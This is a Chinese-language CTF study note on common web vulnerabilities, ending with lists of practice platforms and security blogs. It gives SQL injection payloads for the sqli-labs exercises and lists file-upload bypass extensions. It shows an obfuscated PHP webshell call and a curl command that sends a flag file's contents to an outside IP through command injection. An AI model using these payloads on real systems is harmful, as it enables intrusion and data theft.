常见漏洞

sql注入

联合查询

sqli-labs less-1

  • 判断后台sql语句闭合方式

  • order by判断列数

  • 判断回显位

  • 注数据

''1'' LIMIT 0,1'
'1'' LIMIT 0,1
select * from users where id='$id' LIMIT 0,1
select * from users where id='1'#' LIMIT 0,1
?id=-1' union select 1,2,3 %23
?id=-1' union select 1,group_concat(schema_name),3 from information_schema.schemata%23

盲注

sqli-labs Less-5

bool盲注

?id=1' and 0%23

?id=1' and if(substr(database(),1,1)='s',1,0)%23

1 and 1 ==> 1
0 or 1 ==> 1

延时注入

?id=1' and if(substr(database(),1,1)='s',sleep(3),0)%23

报错注入

sqli-labs Less-5

-1' and updatexml(1,concat(0x7e,database()),1)%23

updatexml(XML_document, XPath_string, new_value)

XML_document是文档对象的名称

XPath_string是XPath格式的字符串(如果XPath_string不是XPath格式,则会报错并显示出XPath_string的值)

new_value替换查找到的数据

文件上传&文件包含

黑名单

php3 php5 phtml .htaccess .user.ini

白名单

没办法,看看有没有其他洞 解析漏洞

各种包含getshell

简单的包含图片马

包含data:// php://input 与php的配置有关

代码注入&命令注入

一些敏感的函数

system shell_exec `` exec …..

eval assert

php语言的特性

无字母数字webshell 异或 取反

<?php
// echo urlencode(~'system');
(~urldecode('%8C%86%8C%8B%9A%92'))('id');

dnslog

http://dnsbin.zhack.ca/

curl 1.1.1.1:9000/?a=`cat /flag`

反序列化

  • 反序列化中魔术方法的调用—->pop链
https://moonback1314.gitee.io/2019/10/27/php-serialize/

https://paper.seebug.org/680/

https://moonback1314.gitee.io/2019/10/27/php-serialize/20191027210743.png

学习的一些建议

多关注圈子社区公众号大佬博客

https://xz.aliyun.com

https://www.anquanke.com

https://paper.seebug.org

https://www.t00ls.net

https://www.freebuf.com

https://www.leavesongs.com

https://skysec.top

https://www.smi1e.top

http://www.gem-love.com

比赛

https://ctftime.org/

微信小程序信安大赛

qq群

做题平台

https://buuoj.cn

https://www.ctfhub.com

https://www.jarvisoj.com

https://adworld.xctf.org.cn

https://cgctf.nuptsast.com

https://ctf.show

https://www.bugku.com

多搜多看

https://www.php.net/manual/zh/index.php

https://www.google.com

http://www.baidu.com